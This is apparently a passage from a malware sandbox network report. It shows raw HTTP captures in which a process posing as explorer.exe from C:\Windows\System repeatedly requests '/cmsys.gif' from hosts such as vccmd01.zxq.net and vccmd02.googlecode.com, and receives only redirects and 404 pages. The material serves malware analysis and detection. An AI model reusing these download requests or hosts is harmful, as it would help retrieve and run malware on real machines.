                                                                                  Aug 5, 2022 09:10:33.513569117 CEST1471OUTGET /cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.zxq.net
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:33.679996967 CEST1472INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: Keep-Alive
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  content-length: 707
                                                                                  date: Fri, 05 Aug 2022 07:10:33 GMT
                                                                                  location: https://zxq.net/cmsys.gif
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                  Aug 5, 2022 09:10:49.037395000 CEST9200OUTGET /cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.zxq.net
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:49.204044104 CEST9201INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: Keep-Alive
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  content-length: 707
                                                                                  date: Fri, 05 Aug 2022 07:10:49 GMT
                                                                                  location: https://zxq.net/cmsys.gif
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                  Aug 5, 2022 09:11:04.308193922 CEST9221OUTGET /cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.zxq.net
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:11:04.474598885 CEST9222INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: Keep-Alive
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  content-length: 707
                                                                                  date: Fri, 05 Aug 2022 07:11:04 GMT
                                                                                  location: https://zxq.net/cmsys.gif
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  12192.168.2.449775142.250.145.8280C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Aug 5, 2022 09:09:49.868995905 CEST1305OUTGET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:09:49.895886898 CEST1313INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:09:49 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:09:49.895904064 CEST1314INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  13192.168.2.449780142.250.145.8280C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Aug 5, 2022 09:09:51.685256004 CEST1368OUTGET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd02.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:09:51.712455034 CEST1369INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:09:51 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
